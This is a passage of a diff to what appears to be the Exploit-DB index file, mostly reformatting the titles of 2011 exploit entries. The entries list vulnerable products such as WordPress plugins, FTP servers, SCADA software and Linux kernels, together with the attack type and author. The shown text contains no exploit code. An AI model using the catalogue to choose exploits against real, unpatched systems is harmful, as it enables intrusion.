Microsoft MPEG Layer-3 Audio Stack Based Overflow",2011-08-13,metasploit,windows,remote,0 17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 SQL Injection Vulnerability",2011-08-13,seceurityoverun,php,webapps,0 -17661,platforms/php/webapps/17661.txt,"Kahf Poems V1.0 Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0 +17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0 17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x (4.6.5) SQL Injection Vulnerability",2011-08-13,"Aung Khant",php,webapps,0 17664,platforms/windows/dos/17664.py,"NSHC Papyrus Heap Overflow Vulnerability",2011-08-13,wh1ant,windows,dos,0 17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 DEP Bypass Exploit",2011-08-13,"C4SS!0 G0M3S",windows,local,0 @@ -15336,16 +15336,16 @@ id,file,description,date,author,platform,type,port 17679,platforms/php/webapps/17679.txt,"WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerability",2011-08-17,"Miroslav Stampar",php,webapps,0 17680,platforms/php/webapps/17680.txt,"WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi",2011-08-17,"Miroslav Stampar",php,webapps,0 17681,platforms/php/webapps/17681.txt,"WordPress OdiHost Newsletter plugin <= 1.0 SQL Injection Vulnerability",2011-08-17,"Miroslav Stampar",php,webapps,0 -17682,platforms/php/webapps/17682.php,"Contrexx Shopsystem =<2.2 SP3 (catId) Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 +17682,platforms/php/webapps/17682.php,"Contrexx Shopsystem <= 2.2 SP3 (catId) - Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 17683,platforms/php/webapps/17683.txt,"WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17684,platforms/php/webapps/17684.txt,"WordPress WP Forum plugin <= 1.7.8 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 -17685,platforms/php/webapps/17685.txt,"Elgg 1.7.10 <= Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0 +17685,platforms/php/webapps/17685.txt,"Elgg <= 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0 17686,platforms/php/webapps/17686.txt,"WordPress Ajax Gallery plugin <= 3.0 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17687,platforms/php/webapps/17687.txt,"WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17688,platforms/php/webapps/17688.txt,"WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17689,platforms/php/webapps/17689.txt,"WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17691,platforms/multiple/remote/17691.rb,"Apache Struts < 2.2.0 Remote Command Execution",2011-08-19,metasploit,multiple,remote,0 -17692,platforms/windows/remote/17692.rb,"Solarftp v2.1.2 PASV Buffer Overflow Exploit (MSF)",2011-08-19,Qnix,windows,remote,0 +17692,platforms/windows/remote/17692.rb,"Solarftp 2.1.2 - PASV Buffer Overflow Exploit (MSF)",2011-08-19,Qnix,windows,remote,0 17694,platforms/php/webapps/17694.txt,"Network Tracker .95 Stored XSS",2011-08-19,G13,php,webapps,0 17695,platforms/php/webapps/17695.txt,"phpMyRealty <= v. 1.0.7 SQL Injection Vulnerability",2011-08-19,H4T$A,php,webapps,0 17696,platforms/multiple/dos/17696.pl,"Apache httpd Remote Denial of Service (memory exhaustion)",2011-08-19,Kingcope,multiple,dos,0 @@ -15365,14 +15365,14 @@ id,file,description,date,author,platform,type,port 17711,platforms/asp/webapps/17711.txt,"Redlab CMS Multiple SQL Injection Vulnerabilities",2011-08-22,tempe_mendoan,asp,webapps,0 17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 GIF Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0 17713,platforms/jsp/webapps/17713.txt,"ManageEngine ServiceDesk Plus 8.0 Multiple Stored XSS Vulnerabilities",2011-08-23,LiquidWorm,jsp,webapps,0 -17714,platforms/php/webapps/17714.txt,"Help Desk Software 1.1g XSRF (add admin) Vulnerability",2011-08-24,G13,php,webapps,0 +17714,platforms/php/webapps/17714.txt,"Help Desk Software 1.1g - CSRF (add admin) Vulnerability",2011-08-24,G13,php,webapps,0 17715,platforms/windows/local/17715.html,"F-Secure Multiple Products ActiveX SEH Overwrite Vulnerability (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin <= 1.5.9 Blind SQL Injection Vulnerability",2011-08-25,evilsocket,php,webapps,0 17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 (.m3u) Local Buffer Overflow PoC",2011-08-26,"D3r K0n!G",windows,dos,0 17719,platforms/windows/remote/17719.rb,"RealVNC Authentication Bypass",2011-08-26,metasploit,windows,remote,0 17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin <= 1.0 SQL Injection Vulnerability",2011-08-26,evilsocket,php,webapps,0 17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 httpsrv.exe Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0 -17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 Arbitrary Code Execution",2011-08-26,"Aung Khant",php,webapps,0 +17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution",2011-08-26,"Aung Khant",php,webapps,0 17724,platforms/php/webapps/17724.txt,"WordPress Js-appointment plugin <= 1.5 SQL Injection Vulnerability",2011-08-27,"Miroslav Stampar",php,webapps,0 17725,platforms/php/webapps/17725.txt,"WordPress MM Forms Community plugin <= 1.2.3 SQL Injection Vulnerability",2011-08-27,"Miroslav Stampar",php,webapps,0 17727,platforms/windows/local/17727.txt,"Free MP3 CD Ripper 1.1 Local Buffer Overflow",2011-08-27,X-h4ck,windows,local,0 @@ -15381,8 +15381,8 @@ id,file,description,date,author,platform,type,port 17730,platforms/php/webapps/17730.txt,"WordPress oQey Headers plugin <= 0.3 SQL Injection Vulnerability",2011-08-27,"Miroslav Stampar",php,webapps,0 17731,platforms/php/webapps/17731.txt,"WordPress Photoracer Plugin <= 1.0 Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0 17732,platforms/windows/local/17732.py,"Free MP3 CD Ripper 1.1 DEP Bypass Exploit",2011-08-27,"C4SS!0 G0M3S",windows,local,0 -17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro <=1.1.0 Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",asp,webapps,0 -17734,platforms/php/webapps/17734.txt,"JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0 +17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro <= 1.1.0 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",asp,webapps,0 +17734,platforms/php/webapps/17734.txt,"JCE Joomla Extension <= 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0 17735,platforms/windows/local/17735.pl,"yahoo! player 1.5 (.m3u) Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0 17736,platforms/php/webapps/17736.txt,"Joomla Simple File Lister module <= 1.0 Directory Traversal Vulnerability",2011-08-28,evilsocket,php,webapps,0 17737,platforms/php/webapps/17737.txt,"WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 @@ -15411,7 +15411,7 @@ id,file,description,date,author,platform,type,port 17762,platforms/windows/remote/17762.rb,"Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability",2011-08-31,metasploit,windows,remote,0 17763,platforms/php/webapps/17763.txt,"WordPress Donation plugin <= 1.0 SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17764,platforms/php/webapps/17764.txt,"WordPress WP Bannerize plugin <= 2.8.6 SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 -17766,platforms/windows/webapps/17766.txt,"NetSaro Enterprise Messenger v2.0 Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",windows,webapps,0 +17766,platforms/windows/webapps/17766.txt,"NetSaro Enterprise Messenger 2.0 - Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",windows,webapps,0 17767,platforms/php/webapps/17767.txt,"WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability",2011-09-01,"Miroslav Stampar",php,webapps,0 17769,platforms/linux/dos/17769.c,"Linux Kernel 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 .plf PlayList Buffer Overflow",2011-09-01,metasploit,windows,local,0 @@ -15424,16 +15424,16 @@ id,file,description,date,author,platform,type,port 17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 SQL Injection Vulnerability",2011-09-05,"Miroslav Stampar",php,webapps,0 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 Buffer Overflow (ASLR Bypass)",2011-09-05,Blake,windows,local,0 17781,platforms/windows/dos/17781.pl,"World Of Warcraft Local Stack Overflow Dos Exploit (chat-cache.txt)",2011-09-05,"BSOD Digital",windows,dos,0 -17782,platforms/php/webapps/17782.txt,"Elite Gaming Ladders v3.6 SQL Injection Vulnerability",2011-09-05,J.O,php,webapps,0 -17783,platforms/windows/local/17783.pl,"ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit",2011-09-05,"C4SS!0 G0M3S",windows,local,0 -17785,platforms/windows/dos/17785.pl,"TOWeb V3 Local Format String DOS Exploit (TOWeb.MO file corruption)",2011-09-05,"BSOD Digital",windows,dos,0 +17782,platforms/php/webapps/17782.txt,"Elite Gaming Ladders 3.6 - SQL Injection Vulnerability",2011-09-05,J.O,php,webapps,0 +17783,platforms/windows/local/17783.pl,"ZipX for Windows 1.71 ZIP File - Buffer Overflow Exploit",2011-09-05,"C4SS!0 G0M3S",windows,local,0 +17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String DOS Exploit (TOWeb.MO file corruption)",2011-09-05,"BSOD Digital",windows,dos,0 17786,platforms/php/webapps/17786.txt,"Webmobo WB News System Blind SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0 17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro SEH Overwrite",2011-09-06,Blake,windows,local,0 17789,platforms/php/webapps/17789.txt,"WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection Vulnerability",2011-09-06,sherl0ck_,php,webapps,0 17790,platforms/php/webapps/17790.txt,"WordPress post highlights plugin <= 2.2 SQL Injection Vulnerability",2011-09-06,"Miroslav Stampar",php,webapps,0 17791,platforms/php/webapps/17791.txt,"WordPress KNR Author List Widget plugin <= 2.0.0 SQL Injection Vulnerability",2011-09-06,"Miroslav Stampar",php,webapps,0 -17792,platforms/php/webapps/17792.txt,"PlaySMS 0.9.5.2 <= Remote File Inclusion Vulnerability",2011-09-06,NoGe,php,webapps,0 +17792,platforms/php/webapps/17792.txt,"PlaySMS <= 0.9.5.2 - Remote File Inclusion Vulnerability",2011-09-06,NoGe,php,webapps,0 17793,platforms/php/webapps/17793.txt,"WordPress SCORM Cloud plugin <= 1.0.6.6 SQL Injection Vulnerability",2011-09-07,"Miroslav Stampar",php,webapps,0 17794,platforms/php/webapps/17794.txt,"WordPress Eventify - Simple Events plugin <= 1.7.f SQL Injection Vulnerability",2011-09-07,"Miroslav Stampar",php,webapps,0 17795,platforms/windows/dos/17795.py,"Crush FTP 5 'APPE' command Remote JVM BSOD PoC Exploit",2011-09-07,"BSOD Digital",windows,dos,0 @@ -15444,7 +15444,7 @@ id,file,description,date,author,platform,type,port 17801,platforms/php/webapps/17801.rb,"Wordpress 1 Flash Gallery Plugin Arbiraty File Upload Exploit (MSF)",2011-09-08,"Ben Schmidt",php,webapps,0 17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0 17806,platforms/linux/dos/17806.txt,"Ubuntu <= 11.04 ftp client Local Buffer Overflow Crash PoC",2011-09-08,localh0t,linux,dos,0 -17807,platforms/php/webapps/17807.txt,"OpenCart v1.5.1.2 / Blind SQL Vulnerability",2011-09-08,"RiRes Walid",php,webapps,0 +17807,platforms/php/webapps/17807.txt,"OpenCart 1.5.1.2 - Blind SQL Vulnerability",2011-09-08,"RiRes Walid",php,webapps,0 17808,platforms/php/webapps/17808.txt,"WordPress WP-Filebase Download Manager plugin <= 0.2.9 SQL Injection Vulnerability",2011-09-09,"Miroslav Stampar",php,webapps,0 17809,platforms/php/webapps/17809.txt,"WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability",2011-09-09,"Miroslav Stampar",php,webapps,0 17810,platforms/windows/remote/17810.rb,"BisonFTP Server Remote Buffer Overflow Exploit (MSF)",2011-09-09,"SecPod Research",windows,remote,0 @@ -15458,17 +15458,17 @@ id,file,description,date,author,platform,type,port 17819,platforms/windows/remote/17819.py,"KnFTP Server Buffer Overflow Exploit",2011-09-12,Blake,windows,remote,0 17820,platforms/windows/local/17820.c,"Aika 0.2 colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0 17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 .pll Buffer Overflow Exploit",2011-09-12,"Iván García Ferreira",windows,local,0 -17822,platforms/php/webapps/17822.txt,"PHP Support Tickets v2.2 Code Exec",2011-09-12,brain[pillow],php,webapps,0 +17822,platforms/php/webapps/17822.txt,"PHP Support Tickets 2.2 - Code Execution",2011-09-12,brain[pillow],php,webapps,0 17823,platforms/php/webapps/17823.txt,"NetCat CMS Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps,0 17824,platforms/php/webapps/17824.txt,"Slaed CMS Code Exec Vulnerability",2011-09-12,brain[pillow],php,webapps,0 17825,platforms/php/webapps/17825.txt,"AstroCMS Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps,0 -17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI <= v1.13 Coreservice.exe Stack Buffer Overflow",2011-09-12,metasploit,windows,remote,0 +17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI <= 1.13 - Coreservice.exe Stack Buffer Overflow",2011-09-12,metasploit,windows,remote,0 17828,platforms/php/webapps/17828.txt,"WordPress WP Forum Server plugin <= 1.7 SQL Injection Vulnerability",2011-09-13,"Miroslav Stampar",php,webapps,0 17829,platforms/php/webapps/17829.txt,"dotProject 2.1.5 SQL Injection Vulnerability",2011-09-13,sherl0ck_,php,webapps,0 17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service <= 5.2.3790.4520 Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 17831,platforms/windows/dos/17831.txt,"MS WINS ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 17832,platforms/php/webapps/17832.txt,"WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability",2011-09-14,"Miroslav Stampar",php,webapps,0 -17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone <= v5.3.11.1230 Stack Buffer Overflow",2011-09-13,metasploit,windows,local,0 +17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone <= 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,metasploit,windows,local,0 17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT <= 2.11.0.2004 Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17836,platforms/windows/dos/17836.txt,"Equis MetaStock <= 11 Use After Free",2011-09-14,"Luigi Auriemma",windows,dos,0 17837,platforms/windows/dos/17837.txt,"eSignal and eSignal Pro <= 10.6.2425.1208 Multiple Vulnerabilites",2011-09-14,"Luigi Auriemma",windows,dos,0 @@ -15483,9 +15483,9 @@ id,file,description,date,author,platform,type,port 17847,platforms/windows/local/17847.py,"Mini-Stream Ripper 2.9.7 DEP Bypass",2011-09-16,Blake,windows,local,0 17848,platforms/windows/remote/17848.rb,"Measuresoft ScadaPro <= 4.0.0 Remote Command Execution",2011-09-16,metasploit,windows,remote,0 17849,platforms/windows/remote/17849.rb,"RealNetworks Realplayer QCP Parsing Heap Overflow",2011-09-17,metasploit,windows,remote,0 -17850,platforms/php/webapps/17850.txt,"iBrowser Plugin v1.4.1 (lang) Local File Inclusion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 -17851,platforms/php/webapps/17851.txt,"iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 -17852,platforms/php/webapps/17852.txt,"iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 +17850,platforms/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 (lang) - Local File Inclusion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 +17851,platforms/php/webapps/17851.txt,"iManager Plugin 1.2.8 (lang) - Local File Inclusion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 +17852,platforms/php/webapps/17852.txt,"iManager Plugin 1.2.8 (d) - Remote Arbitrary File Deletion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 m3u Exploit DEP Bypass",2011-09-17,Blake,windows,local,0 17855,platforms/windows/remote/17855.rb,"DaqFactory HMI NETB Request Overflow",2011-09-18,metasploit,windows,remote,0 17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server Multiple Buffer Overflow Exploit (DoS PoC)",2011-09-18,loneferret,windows,dos,21 @@ -15505,7 +15505,7 @@ id,file,description,date,author,platform,type,port 17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit, 'USER' command",2011-09-19,mr.pr0n,windows,remote,0 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence Multiple Vulnerabilities - SOS-11-010",2011-09-19,"Sense of Security",hardware,webapps,0 17872,platforms/php/webapps/17872.txt,"Multiple Wordpress Plugin timthumb.php Vulnerabilites",2011-09-19,"Ben Schmidt",php,webapps,0 -17873,platforms/windows/webapps/17873.txt,"File disclosure via XEE in SharePoint 2007/2010 and DotNetNuke < 6",2011-09-20,"Nicolas Gregoire",windows,webapps,0 +17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0 17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF",2011-09-20,"Sense of Security",hardware,webapps,0 17876,platforms/windows/remote/17876.py,"ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)",2011-09-20,modpr0be,windows,remote,0 17877,platforms/windows/local/17877.py,"AVCon DEP Bypass",2011-09-20,Blake,windows,local,0 @@ -15514,7 +15514,7 @@ id,file,description,date,author,platform,type,port 17880,platforms/windows/local/17880.rb,"eSignal and eSignal Pro <= 10.6.2425.1208 File Parsing Buffer Overflow in QUO",2011-09-20,metasploit,windows,local,0 17882,platforms/php/webapps/17882.php,"JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit",2011-09-22,EgiX,php,webapps,0 17883,platforms/hardware/remote/17883.txt,"Blue Coat Reporter Unauthenticated Directory Traversal",2011-09-22,nitr0us,hardware,remote,0 -17884,platforms/windows/remote/17884.py,"Cogent Datahub <= v7.1.1.63 Remote Unicode Buffer Overflow Exploit",2011-09-22,mr_me,windows,remote,0 +17884,platforms/windows/remote/17884.py,"Cogent Datahub <= 7.1.1.63 - Remote Unicode Buffer Overflow Exploit",2011-09-22,mr_me,windows,remote,0 17885,platforms/windows/dos/17885.txt,"Sunway ForceControl <= 6.1 sp3 Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 17886,platforms/windows/remote/17886.py,"FreeFloat FTP Server Buffer Overflow Exploit (DEP Bypass)",2011-09-23,Blake,windows,remote,0 17887,platforms/php/webapps/17887.txt,"WordPress Link Library plugin <= 5.2.1 SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 @@ -15523,11 +15523,11 @@ id,file,description,date,author,platform,type,port 17890,platforms/windows/dos/17890.c,"GMER 1.0.15.15641 MFT Overwrite",2011-09-26,Heurs,windows,dos,0 17891,platforms/php/webapps/17891.txt,"WordPress CevherShare Plugin 2.0 SQL Injection",2011-09-26,bd0rk,php,webapps,0 17892,platforms/windows/local/17892.pl,"Muse Music All-In-One 1.5.0.001 .pls File Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0 -17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg Local Buffer Overflow Vulnerability",2011-09-26,Silent_Dream,windows,local,0 +17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow Vulnerability",2011-09-26,Silent_Dream,windows,local,0 17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 -17897,platforms/jsp/webapps/17897.txt,"Multiple Vulnerability in Omnidocs",2011-09-27,"Sohil Garg",jsp,webapps,0 +17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0 17900,platforms/asp/webapps/17900.txt,"TimeLive Time and Expense Tracking 4.1.1 Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 @@ -15545,14 +15545,14 @@ id,file,description,date,author,platform,type,port 17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0 17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection",2011-10-02,metasploit,cgi,webapps,0 17924,platforms/jsp/webapps/17924.pl,"JBoss, JMX Console, misconfigured DeploymentScanner",2011-10-03,y0ug,jsp,webapps,0 -17925,platforms/php/webapps/17925.txt,"Concrete5 <= 5.4.2.1 Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0 +17925,platforms/php/webapps/17925.txt,"Concrete5 <= 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel Admin Auth Bypass",2011-10-04,Jasman,php,webapps,0 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 File Disclosure",2011-10-04,bd0rk,php,webapps,0 17928,platforms/windows/dos/17928.pl,"Ashampoo Burning Studio Elements 10.0.9 (.ashprj) Heap Overflow",2011-10-04,LiquidWorm,windows,dos,0 17929,platforms/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 PDF File Handling Memory Corruption",2011-10-04,"Mario Gomes",windows,dos,0 17930,platforms/windows/dos/17930.txt,"Cytel Studio <= 9.0.0 Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17931,platforms/windows/dos/17931.txt,"GenStat <= 14.1.0.5943 Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 -17932,platforms/linux/local/17932.c,"PolicyKit Pwnage: linux local privilege escalation on polkit-1 <= 0.101",2011-10-05,zx2c4,linux,local,0 +17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 <= 0.101- linux local privilege escalation",2011-10-05,zx2c4,linux,local,0 17933,platforms/windows/dos/17933.html,"DivX Plus Web Player ""file://"" Buffer Overflow Vulnerability PoC",2011-10-05,Snake,windows,dos,0 17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library (show.php) SQL Injection",2011-10-06,M.Jock3R,php,webapps,0 17936,platforms/windows/remote/17936.rb,"Opera 10/11 (bad nesting with frameset tag) Memory Corruption",2011-10-06,"Jose A. Vazquez",windows,remote,0 @@ -15564,7 +15564,7 @@ id,file,description,date,author,platform,type,port 17942,platforms/linux/local/17942.c,"pkexec Race Condition Privilege Escalation Exploit",2011-10-08,xi4oyu,linux,local,0 17943,platforms/php/webapps/17943.txt,"BOOKSolved 1.2.2 Remote File Disclosure",2011-10-08,bd0rk,php,webapps,0 17944,platforms/php/webapps/17944.txt,"Joomla Component Time Returns (com_timereturns) SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 -17946,platforms/php/webapps/17946.txt,"NexusPHP v1.5 SQL Injection",2011-10-08,flyh4t,php,webapps,0 +17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0 17947,platforms/php/webapps/17947.rb,"Snortreport nmap.php and nbtscan.php Remote Command Execution",2011-10-09,metasploit,php,webapps,0 17948,platforms/windows/remote/17948.rb,"ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)",2011-10-09,metasploit,windows,remote,0 17949,platforms/php/webapps/17949.rb,"myBB 1.6.4 Backdoor Exploit",2011-10-09,metasploit,php,webapps,0 @@ -15588,10 +15588,10 @@ id,file,description,date,author,platform,type,port 17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability",2011-10-11,cheki,php,webapps,0 17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection Vulnerability",2011-10-12,Mario_Vs,php,webapps,0 17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin <= 1.9.10 SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 -17974,platforms/windows/remote/17974.html,"Mozilla Firefox Array.reduceRight() Integer Overflow Exploit",2011-10-12,"Matteo Memelli",windows,remote,0 +17974,platforms/windows/remote/17974.html,"Mozilla Firefox Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",2011-10-12,metasploit,windows,remote,0 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox Array.reduceRight() Integer Overflow",2011-10-13,metasploit,windows,remote,0 -17977,platforms/windows/remote/17977.txt,"JBoss AS Remote Exploit v2",2011-10-11,Kingcope,windows,remote,0 +17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,Kingcope,windows,remote,0 17978,platforms/windows/dos/17978.txt,"MS11-077 .fon Kernel-Mode Buffer Overrun PoC",2011-10-13,"Byoungyoung Lee",windows,dos,0 17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin <= 2.7.5 SQL Injection",2011-10-14,Skraps,php,webapps,0 17981,platforms/windows/dos/17981.py,"MS11-064 TCP/IP Stack Denial of Service",2011-10-15,"Byoungyoung Lee",windows,dos,0 @@ -15631,7 +15631,7 @@ id,file,description,date,author,platform,type,port 18019,platforms/windows/dos/18019.txt,"Google Chrome PoC, killing thread",2011-10-22,pigtail23,windows,dos,0 18020,platforms/php/webapps/18020.txt,"jara 1.6 sql injection vulnerability",2011-10-23,muuratsalo,php,webapps,0 18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0 -18022,platforms/php/webapps/18022.txt,"InverseFlow v2.4 CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 +18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 18023,platforms/php/webapps/18023.java,"phpLDAPadmin 0.9.4b DoS",2011-10-23,Alguien,php,webapps,0 18024,platforms/windows/dos/18024.txt,"MS11-077 Win32k Null Pointer De-reference Vulnerability POC",2011-10-23,KiDebug,windows,dos,0 18025,platforms/multiple/dos/18025.txt,"Google Chrome Denial Of Service (DoS)",2011-10-23,"Prashant Uniyal",multiple,dos,0 @@ -15645,12 +15645,12 @@ id,file,description,date,author,platform,type,port 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop XSS Vulnerability",2011-10-26,M.Jock3R,php,webapps,0 18036,platforms/php/webapps/18036.txt,"eFront <= 3.6.10 (build 11944) Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,metasploit,php,webapps,0 -18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg Buffer 